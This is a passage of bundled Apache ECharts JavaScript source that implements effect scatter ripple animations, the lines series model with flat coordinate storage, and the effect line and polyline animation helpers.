information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.effectScatter',\n\n    dependencies: ['grid', 'polar'],\n\n    getInitialData: function (option, ecModel) {\n        return createListFromArray(this.getSource(), this, {useEncodeDefaulter: true});\n    },\n\n    brushSelector: 'point',\n\n    defaultOption: {\n        coordinateSystem: 'cartesian2d',\n        zlevel: 0,\n        z: 2,\n        legendHoverLink: true,\n\n        effectType: 'ripple',\n\n        progressive: 0,\n\n        // When to show the effect, option: 'render'|'emphasis'\n        showEffectOn: 'render',\n\n        // Ripple effect config\n        rippleEffect: {\n            period: 4,\n            // Scale of ripple\n            scale: 2.5,\n            // Brush type can be fill or stroke\n            brushType: 'fill'\n        },\n\n        // Cartesian coordinate system\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        // Polar coordinate system\n        // polarIndex: 0,\n\n        // Geo coordinate system\n        // geoIndex: 0,\n\n        // symbol: null,        // 图形类型\n        symbolSize: 10          // 图形大小，半宽（半径）参数，当图形为方向或菱形则总宽度为symbolSize * 2\n        // symbolRotate: null,  // 图形旋转控制\n\n        // large: false,\n        // Available when large is true\n        // largeThreshold: 2000,\n\n        // itemStyle: {\n        //     opacity: 1\n        // }\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Symbol with ripple effect\n * @module echarts/chart/helper/EffectSymbol\n */\n\nvar EFFECT_RIPPLE_NUMBER = 3;\n\nfunction normalizeSymbolSize$1(symbolSize) {\n    if (!isArray(symbolSize)) {\n        symbolSize = [+symbolSize, +symbolSize];\n    }\n    return symbolSize;\n}\n\nfunction updateRipplePath(rippleGroup, effectCfg) {\n    var color = effectCfg.rippleEffectColor || effectCfg.color;\n    rippleGroup.eachChild(function (ripplePath) {\n        ripplePath.attr({\n            z: effectCfg.z,\n            zlevel: effectCfg.zlevel,\n            style: {\n                stroke: effectCfg.brushType === 'stroke' ? color : null,\n                fill: effectCfg.brushType === 'fill' ? color : null\n            }\n        });\n    });\n}\n/**\n * @constructor\n * @param {module:echarts/data/List} data\n * @param {number} idx\n * @extends {module:zrender/graphic/Group}\n */\nfunction EffectSymbol(data, idx) {\n    Group.call(this);\n\n    var symbol = new SymbolClz$1(data, idx);\n    var rippleGroup = new Group();\n    this.add(symbol);\n    this.add(rippleGroup);\n\n    rippleGroup.beforeUpdate = function () {\n        this.attr(symbol.getScale());\n    };\n    this.updateData(data, idx);\n}\n\nvar effectSymbolProto = EffectSymbol.prototype;\n\neffectSymbolProto.stopEffectAnimation = function () {\n    this.childAt(1).removeAll();\n};\n\neffectSymbolProto.startEffectAnimation = function (effectCfg) {\n    var symbolType = effectCfg.symbolType;\n    var color = effectCfg.color;\n    var rippleGroup = this.childAt(1);\n\n    for (var i = 0; i < EFFECT_RIPPLE_NUMBER; i++) {\n        // If width/height are set too small (e.g., set to 1) on ios10\n        // and macOS Sierra, a circle stroke become a rect, no matter what\n        // the scale is set. So we set width/height as 2. See #4136.\n        var ripplePath = createSymbol(\n            symbolType, -1, -1, 2, 2, color\n        );\n        ripplePath.attr({\n            style: {\n                strokeNoScale: true\n            },\n            z2: 99,\n            silent: true,\n            scale: [0.5, 0.5]\n        });\n\n        var delay = -i / EFFECT_RIPPLE_NUMBER * effectCfg.period + effectCfg.effectOffset;\n        // TODO Configurable effectCfg.period\n        ripplePath.animate('', true)\n            .when(effectCfg.period, {\n                scale: [effectCfg.rippleScale / 2, effectCfg.rippleScale / 2]\n            })\n            .delay(delay)\n            .start();\n        ripplePath.animateStyle(true)\n            .when(effectCfg.period, {\n                opacity: 0\n            })\n            .delay(delay)\n            .start();\n\n        rippleGroup.add(ripplePath);\n    }\n\n    updateRipplePath(rippleGroup, effectCfg);\n};\n\n/**\n * Update effect symbol\n */\neffectSymbolProto.updateEffectAnimation = function (effectCfg) {\n    var oldEffectCfg = this._effectCfg;\n    var rippleGroup = this.childAt(1);\n\n    // Must reinitialize effect if following configuration changed\n    var DIFFICULT_PROPS = ['symbolType', 'period', 'rippleScale'];\n    for (var i = 0; i < DIFFICULT_PROPS.length; i++) {\n        var propName = DIFFICULT_PROPS[i];\n        if (oldEffectCfg[propName] !== effectCfg[propName]) {\n            this.stopEffectAnimation();\n            this.startEffectAnimation(effectCfg);\n            return;\n        }\n    }\n\n    updateRipplePath(rippleGroup, effectCfg);\n};\n\n/**\n * Highlight symbol\n */\neffectSymbolProto.highlight = function () {\n    this.trigger('emphasis');\n};\n\n/**\n * Downplay symbol\n */\neffectSymbolProto.downplay = function () {\n    this.trigger('normal');\n};\n\n/**\n * Update symbol properties\n * @param  {module:echarts/data/List} data\n * @param  {number} idx\n */\neffectSymbolProto.updateData = function (data, idx) {\n    var seriesModel = data.hostModel;\n\n    this.childAt(0).updateData(data, idx);\n\n    var rippleGroup = this.childAt(1);\n    var itemModel = data.getItemModel(idx);\n    var symbolType = data.getItemVisual(idx, 'symbol');\n    var symbolSize = normalizeSymbolSize$1(data.getItemVisual(idx, 'symbolSize'));\n    var color = data.getItemVisual(idx, 'color');\n\n    rippleGroup.attr('scale', symbolSize);\n\n    rippleGroup.traverse(function (ripplePath) {\n        ripplePath.attr({\n            fill: color\n        });\n    });\n\n    var symbolOffset = itemModel.getShallow('symbolOffset');\n    if (symbolOffset) {\n        var pos = rippleGroup.position;\n        pos[0] = parsePercent$1(symbolOffset[0], symbolSize[0]);\n        pos[1] = parsePercent$1(symbolOffset[1], symbolSize[1]);\n    }\n    rippleGroup.rotation = (itemModel.getShallow('symbolRotate') || 0) * Math.PI / 180 || 0;\n\n    var effectCfg = {};\n\n    effectCfg.showEffectOn = seriesModel.get('showEffectOn');\n    effectCfg.rippleScale = itemModel.get('rippleEffect.scale');\n    effectCfg.brushType = itemModel.get('rippleEffect.brushType');\n    effectCfg.period = itemModel.get('rippleEffect.period') * 1000;\n    effectCfg.effectOffset = idx / data.count();\n    effectCfg.z = itemModel.getShallow('z') || 0;\n    effectCfg.zlevel = itemModel.getShallow('zlevel') || 0;\n    effectCfg.symbolType = symbolType;\n    effectCfg.color = color;\n    effectCfg.rippleEffectColor = itemModel.get('rippleEffect.color');\n\n    this.off('mouseover').off('mouseout').off('emphasis').off('normal');\n\n    if (effectCfg.showEffectOn === 'render') {\n        this._effectCfg\n            ? this.updateEffectAnimation(effectCfg)\n            : this.startEffectAnimation(effectCfg);\n\n        this._effectCfg = effectCfg;\n    }\n    else {\n        // Not keep old effect config\n        this._effectCfg = null;\n\n        this.stopEffectAnimation();\n        var symbol = this.childAt(0);\n        var onEmphasis = function () {\n            symbol.highlight();\n            if (effectCfg.showEffectOn !== 'render') {\n                this.startEffectAnimation(effectCfg);\n            }\n        };\n        var onNormal = function () {\n            symbol.downplay();\n            if (effectCfg.showEffectOn !== 'render') {\n                this.stopEffectAnimation();\n            }\n        };\n        this.on('mouseover', onEmphasis, this)\n            .on('mouseout', onNormal, this)\n            .on('emphasis', onEmphasis, this)\n            .on('normal', onNormal, this);\n    }\n\n    this._effectCfg = effectCfg;\n};\n\neffectSymbolProto.fadeOut = function (cb) {\n    this.off('mouseover').off('mouseout').off('emphasis').off('normal');\n    cb && cb();\n};\n\ninherits(EffectSymbol, Group);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendChartView({\n\n    type: 'effectScatter',\n\n    init: function () {\n        this._symbolDraw = new SymbolDraw(EffectSymbol);\n    },\n\n    render: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n        var effectSymbolDraw = this._symbolDraw;\n        effectSymbolDraw.updateData(data);\n        this.group.add(effectSymbolDraw.group);\n    },\n\n    updateTransform: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n\n        this.group.dirty();\n\n        var res = pointsLayout().reset(seriesModel);\n        if (res.progress) {\n            res.progress({ start: 0, end: data.count() }, data);\n        }\n\n        this._symbolDraw.updateLayout(data);\n    },\n\n    _updateGroupTransform: function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n        if (coordSys && coordSys.getRoamTransform) {\n            this.group.transform = clone$2(coordSys.getRoamTransform());\n            this.group.decomposeTransform();\n        }\n    },\n\n    remove: function (ecModel, api) {\n        this._symbolDraw && this._symbolDraw.remove(api);\n    },\n\n    dispose: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(visualSymbol('effectScatter', 'circle'));\nregisterLayout(pointsLayout('effectScatter'));\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Uint32Array, Float64Array, Float32Array */\n\nvar Uint32Arr = typeof Uint32Array === 'undefined' ? Array : Uint32Array;\nvar Float64Arr = typeof Float64Array === 'undefined' ? Array : Float64Array;\n\nfunction compatEc2(seriesOpt) {\n    var data = seriesOpt.data;\n    if (data && data[0] && data[0][0] && data[0][0].coord) {\n        if (__DEV__) {\n            console.warn('Lines data configuration has been changed to'\n                + ' { coords:[[1,2],[2,3]] }');\n        }\n        seriesOpt.data = map(data, function (itemOpt) {\n            var coords = [\n                itemOpt[0].coord, itemOpt[1].coord\n            ];\n            var target = {\n                coords: coords\n            };\n            if (itemOpt[0].name) {\n                target.fromName = itemOpt[0].name;\n            }\n            if (itemOpt[1].name) {\n                target.toName = itemOpt[1].name;\n            }\n            return mergeAll([target, itemOpt[0], itemOpt[1]]);\n        });\n    }\n}\n\nvar LinesSeries = SeriesModel.extend({\n\n    type: 'series.lines',\n\n    dependencies: ['grid', 'polar'],\n\n    visualColorAccessPath: 'lineStyle.color',\n\n    init: function (option) {\n        // The input data may be null/undefined.\n        option.data = option.data || [];\n\n        // Not using preprocessor because mergeOption may not have series.type\n        compatEc2(option);\n\n        var result = this._processFlatCoordsArray(option.data);\n        this._flatCoords = result.flatCoords;\n        this._flatCoordsOffset = result.flatCoordsOffset;\n        if (result.flatCoords) {\n            option.data = new Float32Array(result.count);\n        }\n\n        LinesSeries.superApply(this, 'init', arguments);\n    },\n\n    mergeOption: function (option) {\n        // The input data may be null/undefined.\n        option.data = option.data || [];\n\n        compatEc2(option);\n\n        if (option.data) {\n            // Only update when have option data to merge.\n            var result = this._processFlatCoordsArray(option.data);\n            this._flatCoords = result.flatCoords;\n            this._flatCoordsOffset = result.flatCoordsOffset;\n            if (result.flatCoords) {\n                option.data = new Float32Array(result.count);\n            }\n        }\n\n        LinesSeries.superApply(this, 'mergeOption', arguments);\n    },\n\n    appendData: function (params) {\n        var result = this._processFlatCoordsArray(params.data);\n        if (result.flatCoords) {\n            if (!this._flatCoords) {\n                this._flatCoords = result.flatCoords;\n                this._flatCoordsOffset = result.flatCoordsOffset;\n            }\n            else {\n                this._flatCoords = concatArray(this._flatCoords, result.flatCoords);\n                this._flatCoordsOffset = concatArray(this._flatCoordsOffset, result.flatCoordsOffset);\n            }\n            params.data = new Float32Array(result.count);\n        }\n\n        this.getRawData().appendData(params.data);\n    },\n\n    _getCoordsFromItemModel: function (idx) {\n        var itemModel = this.getData().getItemModel(idx);\n        var coords = (itemModel.option instanceof Array)\n            ? itemModel.option : itemModel.getShallow('coords');\n\n        if (__DEV__) {\n            if (!(coords instanceof Array && coords.length > 0 && coords[0] instanceof Array)) {\n                throw new Error(\n                    'Invalid coords ' + JSON.stringify(coords) + '. Lines must have 2d coords array in data item.'\n                );\n            }\n        }\n        return coords;\n    },\n\n    getLineCoordsCount: function (idx) {\n        if (this._flatCoordsOffset) {\n            return this._flatCoordsOffset[idx * 2 + 1];\n        }\n        else {\n            return this._getCoordsFromItemModel(idx).length;\n        }\n    },\n\n    getLineCoords: function (idx, out) {\n        if (this._flatCoordsOffset) {\n            var offset = this._flatCoordsOffset[idx * 2];\n            var len = this._flatCoordsOffset[idx * 2 + 1];\n            for (var i = 0; i < len; i++) {\n                out[i] = out[i] || [];\n                out[i][0] = this._flatCoords[offset + i * 2];\n                out[i][1] = this._flatCoords[offset + i * 2 + 1];\n            }\n            return len;\n        }\n        else {\n            var coords = this._getCoordsFromItemModel(idx);\n            for (var i = 0; i < coords.length; i++) {\n                out[i] = out[i] || [];\n                out[i][0] = coords[i][0];\n                out[i][1] = coords[i][1];\n            }\n            return coords.length;\n        }\n    },\n\n    _processFlatCoordsArray: function (data) {\n        var startOffset = 0;\n        if (this._flatCoords) {\n            startOffset = this._flatCoords.length;\n        }\n        // Stored as a typed array. In format\n        // Points Count(2) | x | y | x | y | Points Count(3) | x |  y | x | y | x | y |\n        if (typeof data[0] === 'number') {\n            var len = data.length;\n            // Store offset and len of each segment\n            var coordsOffsetAndLenStorage = new Uint32Arr(len);\n            var coordsStorage = new Float64Arr(len);\n            var coordsCursor = 0;\n            var offsetCursor = 0;\n            var dataCount = 0;\n            for (var i = 0; i < len;) {\n                dataCount++;\n                var count = data[i++];\n                // Offset\n                coordsOffsetAndLenStorage[offsetCursor++] = coordsCursor + startOffset;\n                // Len\n                coordsOffsetAndLenStorage[offsetCursor++] = count;\n                for (var k = 0; k < count; k++) {\n                    var x = data[i++];\n                    var y = data[i++];\n                    coordsStorage[coordsCursor++] = x;\n                    coordsStorage[coordsCursor++] = y;\n\n                    if (i > len) {\n                        if (__DEV__) {\n                            throw new Error('Invalid data format.');\n                        }\n                    }\n                }\n            }\n\n            return {\n                flatCoordsOffset: new Uint32Array(coordsOffsetAndLenStorage.buffer, 0, offsetCursor),\n                flatCoords: coordsStorage,\n                count: dataCount\n            };\n        }\n\n        return {\n            flatCoordsOffset: null,\n            flatCoords: null,\n            count: data.length\n        };\n    },\n\n    getInitialData: function (option, ecModel) {\n        if (__DEV__) {\n            var CoordSys = CoordinateSystemManager.get(option.coordinateSystem);\n            if (!CoordSys) {\n                throw new Error('Unkown coordinate system ' + option.coordinateSystem);\n            }\n        }\n\n        var lineData = new List(['value'], this);\n        lineData.hasItemOption = false;\n\n        lineData.initData(option.data, [], function (dataItem, dimName, dataIndex, dimIndex) {\n            // dataItem is simply coords\n            if (dataItem instanceof Array) {\n                return NaN;\n            }\n            else {\n                lineData.hasItemOption = true;\n                var value = dataItem.value;\n                if (value != null) {\n                    return value instanceof Array ? value[dimIndex] : value;\n                }\n            }\n        });\n\n        return lineData;\n    },\n\n    formatTooltip: function (dataIndex) {\n        var data = this.getData();\n        var itemModel = data.getItemModel(dataIndex);\n        var name = itemModel.get('name');\n        if (name) {\n            return name;\n        }\n        var fromName = itemModel.get('fromName');\n        var toName = itemModel.get('toName');\n        var html = [];\n        fromName != null && html.push(fromName);\n        toName != null && html.push(toName);\n\n        return encodeHTML(html.join(' > '));\n    },\n\n    preventIncremental: function () {\n        return !!this.get('effect.show');\n    },\n\n    getProgressive: function () {\n        var progressive = this.option.progressive;\n        if (progressive == null) {\n            return this.option.large ? 1e4 : this.get('progressive');\n        }\n        return progressive;\n    },\n\n    getProgressiveThreshold: function () {\n        var progressiveThreshold = this.option.progressiveThreshold;\n        if (progressiveThreshold == null) {\n            return this.option.large ? 2e4 : this.get('progressiveThreshold');\n        }\n        return progressiveThreshold;\n    },\n\n    defaultOption: {\n        coordinateSystem: 'geo',\n        zlevel: 0,\n        z: 2,\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n        // Cartesian coordinate system\n        xAxisIndex: 0,\n        yAxisIndex: 0,\n\n        symbol: ['none', 'none'],\n        symbolSize: [10, 10],\n        // Geo coordinate system\n        geoIndex: 0,\n\n        effect: {\n            show: false,\n            period: 4,\n            // Animation delay. support callback\n            // delay: 0,\n            // If move with constant speed px/sec\n            // period will be ignored if this property is > 0,\n            constantSpeed: 0,\n            symbol: 'circle',\n            symbolSize: 3,\n            loop: true,\n            // Length of trail, 0 - 1\n            trailLength: 0.2\n            // Same with lineStyle.color\n            // color\n        },\n\n        large: false,\n        // Available when large is true\n        largeThreshold: 2000,\n\n        // If lines are polyline\n        // polyline not support curveness, label, animation\n        polyline: false,\n\n        // If clip the overflow.\n        // Available when coordinateSystem is cartesian or polar.\n        clip: true,\n\n        label: {\n            show: false,\n            position: 'end'\n            // distance: 5,\n            // formatter: 标签文本格式器，同Tooltip.formatter，不支持异步回调\n        },\n\n        lineStyle: {\n            opacity: 0.5\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Provide effect for line\n * @module echarts/chart/helper/EffectLine\n */\n\n/**\n * @constructor\n * @extends {module:zrender/graphic/Group}\n * @alias {module:echarts/chart/helper/Line}\n */\nfunction EffectLine(lineData, idx, seriesScope) {\n    Group.call(this);\n\n    this.add(this.createLine(lineData, idx, seriesScope));\n\n    this._updateEffectSymbol(lineData, idx);\n}\n\nvar effectLineProto = EffectLine.prototype;\n\neffectLineProto.createLine = function (lineData, idx, seriesScope) {\n    return new Line$1(lineData, idx, seriesScope);\n};\n\neffectLineProto._updateEffectSymbol = function (lineData, idx) {\n    var itemModel = lineData.getItemModel(idx);\n    var effectModel = itemModel.getModel('effect');\n    var size = effectModel.get('symbolSize');\n    var symbolType = effectModel.get('symbol');\n    if (!isArray(size)) {\n        size = [size, size];\n    }\n    var color = effectModel.get('color') || lineData.getItemVisual(idx, 'color');\n    var symbol = this.childAt(1);\n\n    if (this._symbolType !== symbolType) {\n        // Remove previous\n        this.remove(symbol);\n\n        symbol = createSymbol(\n            symbolType, -0.5, -0.5, 1, 1, color\n        );\n        symbol.z2 = 100;\n        symbol.culling = true;\n\n        this.add(symbol);\n    }\n\n    // Symbol may be removed if loop is false\n    if (!symbol) {\n        return;\n    }\n\n    // Shadow color is same with color in default\n    symbol.setStyle('shadowColor', color);\n    symbol.setStyle(effectModel.getItemStyle(['color']));\n\n    symbol.attr('scale', size);\n\n    symbol.setColor(color);\n    symbol.attr('scale', size);\n\n    this._symbolType = symbolType;\n    this._symbolScale = size;\n\n    this._updateEffectAnimation(lineData, effectModel, idx);\n};\n\neffectLineProto._updateEffectAnimation = function (lineData, effectModel, idx) {\n\n    var symbol = this.childAt(1);\n    if (!symbol) {\n        return;\n    }\n\n    var self = this;\n\n    var points = lineData.getItemLayout(idx);\n\n    var period = effectModel.get('period') * 1000;\n    var loop = effectModel.get('loop');\n    var constantSpeed = effectModel.get('constantSpeed');\n    var delayExpr = retrieve(effectModel.get('delay'), function (idx) {\n        return idx / lineData.count() * period / 3;\n    });\n    var isDelayFunc = typeof delayExpr === 'function';\n\n    // Ignore when updating\n    symbol.ignore = true;\n\n    this.updateAnimationPoints(symbol, points);\n\n    if (constantSpeed > 0) {\n        period = this.getLineLength(symbol) / constantSpeed * 1000;\n    }\n\n    if (period !== this._period || loop !== this._loop) {\n\n        symbol.stopAnimation();\n\n        var delay = delayExpr;\n        if (isDelayFunc) {\n            delay = delayExpr(idx);\n        }\n        if (symbol.__t > 0) {\n            delay = -period * symbol.__t;\n        }\n        symbol.__t = 0;\n        var animator = symbol.animate('', loop)\n            .when(period, {\n                __t: 1\n            })\n            .delay(delay)\n            .during(function () {\n                self.updateSymbolPosition(symbol);\n            });\n        if (!loop) {\n            animator.done(function () {\n                self.remove(symbol);\n            });\n        }\n        animator.start();\n    }\n\n    this._period = period;\n    this._loop = loop;\n};\n\neffectLineProto.getLineLength = function (symbol) {\n    // Not so accurate\n    return (dist(symbol.__p1, symbol.__cp1)\n        + dist(symbol.__cp1, symbol.__p2));\n};\n\neffectLineProto.updateAnimationPoints = function (symbol, points) {\n    symbol.__p1 = points[0];\n    symbol.__p2 = points[1];\n    symbol.__cp1 = points[2] || [\n        (points[0][0] + points[1][0]) / 2,\n        (points[0][1] + points[1][1]) / 2\n    ];\n};\n\neffectLineProto.updateData = function (lineData, idx, seriesScope) {\n    this.childAt(0).updateData(lineData, idx, seriesScope);\n    this._updateEffectSymbol(lineData, idx);\n};\n\neffectLineProto.updateSymbolPosition = function (symbol) {\n    var p1 = symbol.__p1;\n    var p2 = symbol.__p2;\n    var cp1 = symbol.__cp1;\n    var t = symbol.__t;\n    var pos = symbol.position;\n    var lastPos = [pos[0], pos[1]];\n    var quadraticAt$$1 = quadraticAt;\n    var quadraticDerivativeAt$$1 = quadraticDerivativeAt;\n    pos[0] = quadraticAt$$1(p1[0], cp1[0], p2[0], t);\n    pos[1] = quadraticAt$$1(p1[1], cp1[1], p2[1], t);\n\n    // Tangent\n    var tx = quadraticDerivativeAt$$1(p1[0], cp1[0], p2[0], t);\n    var ty = quadraticDerivativeAt$$1(p1[1], cp1[1], p2[1], t);\n\n    symbol.rotation = -Math.atan2(ty, tx) - Math.PI / 2;\n    // enable continuity trail for 'line', 'rect', 'roundRect' symbolType\n    if (this._symbolType === 'line' || this._symbolType === 'rect' || this._symbolType === 'roundRect') {\n        if (symbol.__lastT !== undefined && symbol.__lastT < symbol.__t) {\n            var scaleY = dist(lastPos, pos) * 1.05;\n            symbol.attr('scale', [symbol.scale[0], scaleY]);\n            // make sure the last segment render within endPoint\n            if (t === 1) {\n                pos[0] = lastPos[0] + (pos[0] - lastPos[0]) / 2;\n                pos[1] = lastPos[1] + (pos[1] - lastPos[1]) / 2;\n            }\n        }\n        else if (symbol.__lastT === 1) {\n            // After first loop, symbol.__t does NOT start with 0, so connect p1 to pos directly.\n            var scaleY = 2 * dist(p1, pos);\n            symbol.attr('scale', [symbol.scale[0], scaleY ]);\n        }\n        else {\n            symbol.attr('scale', this._symbolScale);\n        }\n    }\n    symbol.__lastT = symbol.__t;\n    symbol.ignore = false;\n};\n\n\neffectLineProto.updateLayout = function (lineData, idx) {\n    this.childAt(0).updateLayout(lineData, idx);\n\n    var effectModel = lineData.getItemModel(idx).getModel('effect');\n    this._updateEffectAnimation(lineData, effectModel, idx);\n};\n\ninherits(EffectLine, Group);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/chart/helper/Line\n */\n\n/**\n * @constructor\n * @extends {module:zrender/graphic/Group}\n * @alias {module:echarts/chart/helper/Polyline}\n */\nfunction Polyline$2(lineData, idx, seriesScope) {\n    Group.call(this);\n\n    this._createPolyline(lineData, idx, seriesScope);\n}\n\nvar polylineProto = Polyline$2.prototype;\n\npolylineProto._createPolyline = function (lineData, idx, seriesScope) {\n    // var seriesModel = lineData.hostModel;\n    var points = lineData.getItemLayout(idx);\n\n    var line = new Polyline({\n        shape: {\n            points: points\n        }\n    });\n\n    this.add(line);\n\n    this._updateCommonStl(lineData, idx, seriesScope);\n};\n\npolylineProto.updateData = function (lineData, idx, seriesScope) {\n    var seriesModel = lineData.hostModel;\n\n    var line = this.childAt(0);\n    var target = {\n        shape: {\n            points: lineData.getItemLayout(idx)\n        }\n    };\n    updateProps(line, target, seriesModel, idx);\n\n    this._updateCommonStl(lineData, idx, seriesScope);\n};\n\npolylineProto._updateCommonStl = function (lineData, idx, seriesScope) {\n    var line = this.childAt(0);\n    var itemModel = lineData.getItemModel(idx);\n\n    var visualColor = lineData.getItemVisual(idx, 'color');\n\n    var lineStyle = seriesScope && seriesScope.lineStyle;\n    var hoverLineStyle = seriesScope && seriesScope.hoverLineStyle;\n\n    if (!seriesScope || lineData.hasItemOption) {\n        lineStyle = itemModel.getModel('lineStyle').getLineStyle();\n        hoverLineStyle = itemModel.getModel('emphasis.lineStyle').getLineStyle();\n    }\n    line.useStyle(defaults(\n        {\n            strokeNoScale: true,\n            fill: 'none',\n            stroke: visualColor\n        },\n        lineStyle\n    ));\n    line.hoverStyle = hoverLineStyle;\n\n    setHoverStyle(this);\n};\n\npolylineProto.updateLayout = function (lineData, idx) {\n    var polyline = this.childAt(0);\n    polyline.setShape('points', lineData.getItemLayout(idx));\n};\n\ninherits(Polyline$2, Group);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Provide effect for line\n * @module echarts/chart/helper/EffectLine\n */\n\n/**\n * @constructor\n * @extends {module:echarts/chart/helper/EffectLine}\n * @alias {module:echarts/chart/helper/Polyline}\n */\nfunction EffectPolyline(lineData, idx, seriesScope) {\n    EffectLine.call(this, lineData, idx, seriesScope);\n    this._lastFrame = 0;\n    this._lastFramePercent = 0;\n}\n\nvar effectPolylineProto = EffectPolyline.prototype;\n\n// Overwrite\neffectPolylineProto.createLine = function (lineData, idx, seriesScope) {\n    return new Polyline$2(lineData, idx, seriesScope);\n};\n\n// Overwrite\neffectPolylineProto.updateAnimationPoints = function (symbol, points) {\n    this._points = points;\n    var accLenArr = [0];\n    var len$$1 = 0;\n    for (var i = 1; i < points.length; i++) {\n        var p1 = points[i - 1];\n        var p2 = points[i];\n        len$$1 += dist(p1, p2);\n        accLenArr.push(len$$1);\n    }\n    if (len$$1 === 0) {\n        return;\n    }\n\n    for (var i = 0; i < accLenArr.length; i++) {\n        accLenArr[i] /= len$$1;\n    }\n    this._offsets = accLenArr;\n    this._length = len$$1;\n};\n\n// Overwrite\neffectPolylineProto.getLineLength = function (symbol) {\n    return this._length;\n};\n\n// Overwrite\neffectPolylineProto.updateSymbolPosition = function (symbol) {\n    var t = symbol.__t;\n    var points = this._points;\n    var offsets = this._offsets;\n    var len$$1 = points.length;\n\n    if (!offsets) {\n        // Has length 0\n        return;\n    }\n\n    var lastFrame = this._lastFrame;\n    var frame;\n\n    if (t < this._lastFramePercent) {\n        // Start from the next frame\n        // PENDING start from lastFrame ?\n        var start = Math.min(lastFrame + 1, len$$1 - 1);\n        for (frame = start; frame >= 0; frame--) {\n            if (offsets[frame] <= t) {\n                break;\n            }\n        }\n        // PENDING really need to do this ?\n        frame = Math.min(frame, len$$1 - 2);\n    }\n    else {\n        for (var frame = lastFrame; frame < len$$1; frame++) {\n            if (offsets[frame] > t) {\n                break;\n            }\n        }\n        